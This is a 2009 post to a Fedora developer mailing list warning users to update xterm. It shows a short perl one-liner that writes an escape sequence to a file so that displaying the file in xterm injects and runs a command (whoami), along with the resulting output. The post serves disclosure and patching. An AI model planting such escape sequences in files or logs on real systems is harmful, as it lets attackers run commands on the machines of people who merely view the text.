security update for xterm needed
Christoph Höger
choeger at cs.tu-berlin.de
Tue Jan 6 12:49:50 UTC 2009
Hi folks,
I will file a bug becasue of this, but you should be sure to update
xterm asap, if you use it:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
I testet on fedora 10 accordign to
http://www.heise.de/newsticker/Terminal-Emulator-xterm-fuehrt-untergeschobene-Befehle-aus--/meldung/121196
(sorry, german)
I tried:
[choeger at choeger5 ~]$ perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
and in xterm:
[choeger at choeger5 ~]$ cat bla.log
^[P0$r
whoami
^[\[choeger at choeger5 ~]$
[choeger at choeger5 ~]$ whoami
choeger
[choeger at choeger5 ~]$
[choeger at choeger5 ~]$
As you can see, its valid.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: Dies ist ein digital signierter Nachrichtenteil
Url : http://lists.fedoraproject.org/pipermail/devel/attachments/20090106/eb426585/attachment.bin
More information about the devel
mailing list